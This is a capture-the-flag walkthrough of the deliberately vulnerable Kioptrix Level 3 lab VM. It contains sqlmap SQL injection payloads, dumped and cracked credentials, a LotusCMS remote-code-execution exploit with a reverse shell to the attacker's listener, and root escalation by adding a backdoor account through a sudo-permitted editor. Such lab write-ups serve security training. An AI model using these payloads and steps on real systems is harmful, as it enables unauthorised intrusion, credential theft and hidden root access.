Level 3
About Release
Name: Kioptrix: Level 1.2 (#3)
Date release: 18 Apr 2011
Author: Kioptrix
Series: Kioptrix
Web page: http://www.kioptrix.com/blog/?p=358
Download
KVM3.rar (Size: 442 MB)
Download: http://www.kioptrix.com/dlvm/KVM3.rar
Download (Mirror): https://download.vulnhub.com/kioptrix/KVM3.rar
Description
It's been a while since the last Kioptrix VM challenge. Life keeps getting the way of these things you know.
After the seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges. I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.
As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.comUnder Linux that would be /etc/hosts
There’s a web application involved, so to have everything nice and properly displayed you really need to this.
Hope you enjoy Kioptrix VM Level 1.2 challenge.
452 Megs
MD5 Hash : d324ffadd8e3efc1f96447eec51901f2
Have fun
Source: http://www.kioptrix.com/blog/?p=358
Recon
└─$ ip -4 -brief address show eth0
eth0 UP 10.0.2.15/24
└─$ sudo netdiscover -P -i eth0 -r 10.0.2.0/24 | tee netdiscover.log
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.2.1 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.2 52:54:00:12:35:00 1 60 Unknown vendor
10.0.2.3 08:00:27:64:6e:66 1 60 PCS Systemtechnik GmbH
10.0.2.21 08:00:27:0c:18:78 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 4 Hosts found.
└─$ grep kio /etc/hosts
10.0.2.21 kioptrix3.comHTTP (80)
See it now! redirects us to /gallery where we can see path is used to retrieve certain items from probably database. After trying few payloads it doesn't seem injectable.
If we visit Ligoat Press Room there's a sort feature which seems to add parameters to the query.
SQLi
Injecting a quote (') triggers SQL error, meaning SQLi
└─$ sqlmap -u 'http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename' --dbms=mysql --batch --current-db --dump
...
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (6172=6172) THEN 1 ELSE (SELECT 2162 UNION SELECT 4307) END))&sort=filename
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(5785,2330)>(SELECT COUNT(*),CONCAT(0x71626b6271,(SELECT (ELT(5785=5785,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM (SELECT 5230 UNION SELECT 2834 UNION SELECT 6888 UNION SELECT 5045)a GROUP BY x)&sort=filename
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 2862 FROM (SELECT(SLEEP(5)))GVIe)&sort=filename
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x71626b6271,0x426b4a7a56777a4a6d6856537a45637a7772794a486d41506e6b78767a78434a6a46514c44506676,0x717a6a6a71),NULL,NULL,NULL,NULL-- -&sort=filename
---
...
└─$ bat ~/.local/share/sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv
───────┬────────────────────────────────────────────────────────────────────────────
│ File: /home/woyag/.local/share/sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv
───────┼────────────────────────────────────────────────────────────────────────────
1 │ id,password,username
2 │ 1,0d3eccfb887aabd50f243b3f155c0f85,dreg
3 │ 2,5badcaf789d3d1d09794d8f021f40f0e,loneferret
───────┴────────────────────────────────────────────────────────────────────────────
└─$ bat ~/.local/share/sqlmap/output/kioptrix3.com/dump/gallery/gallarific_users.csv
───────┬────────────────────────────────────────────────────────────────────────────────
│ File: /home/woyag/.local/share/sqlmap/output/kioptrix3.com/dump/gallery/gallarific_users.csv
───────┼────────────────────────────────────────────────────────────────────────────────
1 │ userid,email,photo,website,joincode,lastname,password,username,usertype,firstname,datejoined,issuperuser
2 │ 1,<blank>,<blank>,<blank>,<blank>,User,n0t7t1k4,admin,superuser,Super,1302628616,1
───────┴────────────────────────────────────────────────────────────────────────────────Database Accounts
Crack the user hashes:
0d3eccfb887aabd50f243b3f155c0f85
md5
Mast3r
5badcaf789d3d1d09794d8f021f40f0e
md5
starwars
SSH Creds
admin
n0t7t1k4
dreg
Mast3r
loneferret
starwars
Oddly enough none of the users worked on CMS login page, but they are valid ssh credentials! (except admin)
LotusCMS
The CMS which webapp uses is LotusCMS
Quick google search leads us to LotusCMS 3.0 eval() Remote Command Execution
The msf module was unable to get shell:
msf6 > use exploit/multi/http/lcms_php_exec
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) > set RHOST 10.0.2.21
RHOST => 10.0.2.21
msf6 exploit(multi/http/lcms_php_exec) > set URI /
URI => /
msf6 exploit(multi/http/lcms_php_exec) > run
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Exploit completed, but no session was created.└─$ git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit.git
└─$ cd LotusCMS-Exploit
└─$ bash lotusRCE.sh kioptrix3.com /
---
└─$ listen # rlwrap ncat -lvnp 4444www-data
Anyway, we don't need to go further into this path as we already have actual user accounts on ssh.
SSH (22)
We have 2 users which we can login as.
└─$ ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss dreg@10.0.2.21
dreg@Kioptrix3:~$ id
uid=1001(dreg) gid=1001(dreg) groups=1001(dreg)
dreg@Kioptrix3:~$ sudo -l
[sudo] password for dreg: Mast3r
Sorry, user dreg may not run sudo on Kioptrix3.
dreg@Kioptrix3:~$ su - loneferret
Password: starwars
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/htLooks like loneferret has sudo access, so we'll discard dreg.
Sudo Binaries
Great, su doesn't exist in given path and ht is wacky program...
loneferret@Kioptrix3:~$ sudo /usr/bin/su
sudo: /usr/bin/su: command not found
loneferret@Kioptrix3:~$ ls /usr/bin/s?
/usr/bin/sg
loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht
Error opening terminal: tmux-256color.loneferret@Kioptrix3:~$ ls
checksec.sh CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEOSince I couldn't run binary, get help or man page I decided to see strings within program, after piping result to less I got terminal is not fully functional
Fix Terminal
ArchLinux » Networking, Server, and Protection» WARNING: terminal is not fully functional
loneferret@Kioptrix3:~$ ht
Error opening terminal: tmux-256color.
loneferret@Kioptrix3:~$ strings /usr/local/bin/ht | less
WARNING: terminal is not fully functional
loneferret@Kioptrix3:~$ export TERM=rxvt
loneferret@Kioptrix3:~$ ht # <-- Worked
loneferret@Kioptrix3:~$Setting TERM fixed the issue with the binary.
sudo /usr/local/bin/ht
The program is some sort of editor. The first highlighted letters are actually shortcuts which can be accessed via Alt+KEY.
To open file Alt+F -> Arrow Down -> Open -> Filename
We essentially have a binary with root privileges, meaning we can read/write whatever.
Add New User
Let's add new user to system:
└─$ openssl passwd -6 -salt back door
$6$back$ZEe0NXkJ.MD8pgefaf8ihIknjA5aBcdHra0qz2/784AoQlin/X/qlqsQj2LdqXs55GHAA2PgcjB121eZSuP5I0
Root
loneferret@Kioptrix3:~$ su - uwu
Password: door
No directory, logging in with HOME=/
root@Kioptrix3:/# cd /root
root@Kioptrix3:/root# ls -l
total 16
-rw-r--r-- 1 root root 1327 2011-04-16 08:13 Congrats.txt
drwxr-xr-x 12 root root 12288 2011-04-16 07:26 ht-2.0.18
root@Kioptrix3:/root# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasnt that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.Last updated